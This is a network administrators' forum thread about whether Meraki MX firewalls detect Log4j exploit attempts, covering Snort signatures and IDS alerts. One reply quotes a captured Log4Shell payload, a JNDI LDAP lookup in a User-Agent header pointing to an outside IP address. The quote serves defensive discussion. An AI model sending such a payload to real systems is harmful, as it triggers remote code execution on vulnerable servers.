Meraki

Community

Log4J detection

lpopejoy
A model citizen
‎Dec 11 2021 1:03 PM
‎Dec 11 2021 1:03 PM

Log4J detection

According to https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html Meraki MX (w/ Advanced Security, I'm sure) can detect and block Log4J exploits (https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java).

 

I'm curious how this is possible if the the traffic is TLS encrypted.  As far as I know, Meraki MX is not doing SSL inspection/decryption which means that Log4j compromises couldn't be detected, right?

Labels:
11 Replies 11
AndrewHaines76
Conversationalist
‎Dec 13 2021 5:45 AM
‎Dec 13 2021 5:45 AM

Would be nice to get comment from Cisco/Meraki.   Lot of patching this week.

Andrew Haines
0 Kudos
LucasDelmarcel
Conversationalist
‎Dec 13 2021 5:55 AM
‎Dec 13 2021 5:55 AM

Hi community, we have this issue currently investigated (not with Cisco, but internally as we are a Cisco partner)

Meraki MX uses the same kind of security intelligence sources as lets say an FTD  (Cisco Thalos, Snort,etc,..) , and after discussed this with our senior engineers we believe Meraki firewalls should have the latest updates installed and so the latest Snort-definitions.


See this for reference

https://www.snort.org/advisories/talos-rules-2021-12-11

It doesn't seem SSL inspection is necessary, but layer 7 application-based policy should do for IPS.

 

Also, I would personally recommend to restrict LDAP, DNS traffic to a bare minimum so it's tightened to what you really need (ex: DNS-server can reach outside, but rest of the network is more limited)

General security advisory..

 

Hope this helps

 

Kind regards

0 Kudos
DangerNoodle
Here to help
‎Dec 13 2021 8:11 AM
‎Dec 13 2021 8:11 AM

For what it's worth, the IDS/IPS in the Meraki MX series is catching it. We had these alerts on a public facing DVR.

 

DangerNoodle_0-1639411822535.png

 

In response to DangerNoodle
lpopejoy
A model citizen
‎Dec 13 2021 9:36 AM
‎Dec 13 2021 9:36 AM

@DangerNoodle  that is VERY cool.  Thank you for sharing that.  I would still like to know more details on *how* it works, but I guess it is just looking at source IP's.  Do you know if this connection was inbound to a TLS encrypted port?

0 Kudos
In response to lpopejoy
DangerNoodle
Here to help
‎Dec 13 2021 9:46 AM
‎Dec 13 2021 9:46 AM

It was a http request made to the login page of the DVR. 

It triggered this SNORT rule: https://snort.org/rule_docs/1-58737

 

Looking at the inspect packet, they tried to inject this:

User-Agent: ${jndi:ldap://193.3.19.159:53/c}..Accept: */*..Accept-Encoding: gzip

 

0 Kudos
In response to DangerNoodle
lpopejoy
A model citizen
‎Dec 13 2021 10:01 AM
‎Dec 13 2021 10:01 AM

Ah, ok.  So if it would have been HTTPS, would it still have been blocked?  My guess is "no."

0 Kudos
IT_Magician
Building a reputation
‎Dec 13 2021 1:23 PM
‎Dec 13 2021 1:23 PM

To confirm, if Meraki is showing this as being blocked, that does not mean the downstream device is vulnerable, correct? It just means someone was hitting the downstream device with a string which the MX is blocking?

In response to IT_Magician
LucasDelmarcel
Conversationalist
‎Dec 13 2021 1:30 PM
‎Dec 13 2021 1:30 PM

Correct. You should make an inventory to assess what is running vulnerable versions of software. I use Metasploit vulnerability scanner for this. Stay safe !

0 Kudos
myky_
Conversationalist
‎Dec 14 2021 7:50 AM
‎Dec 14 2021 7:50 AM

@lpopejoy for IPS/IDS, you don't necessarily need SSL decryption; otherwise, it would be useless a long time ago. 

Primarily, it's based on the signatures (traffic flow behaviour/pattern/fingerprinting) that exploit uses.

 

Once it's detected/identified, a signature is created and pushed to the device IPS/IDS database.

In response to myky_
GIdenJoe
Kind of a big deal
Kind of a big deal
‎Dec 14 2021 12:07 PM
‎Dec 14 2021 12:07 PM

Indeed.  You would bring most MX'es to their knees if you turned on decryption.

0 Kudos
hockeydude
Getting noticed
‎Dec 14 2021 3:30 PM
‎Dec 14 2021 3:30 PM

Same here. IDS blocking log4j attempts

Screen Shot 2021-12-14 at 3.27.09 PM.png

Get notified when there are additional replies to this discussion.
Welcome to the Meraki Community!
To start contributing, simply sign in with your Cisco account. If you don't yet have a Cisco account, you can sign up.
Labels
© 2024 Cisco Systems, Inc.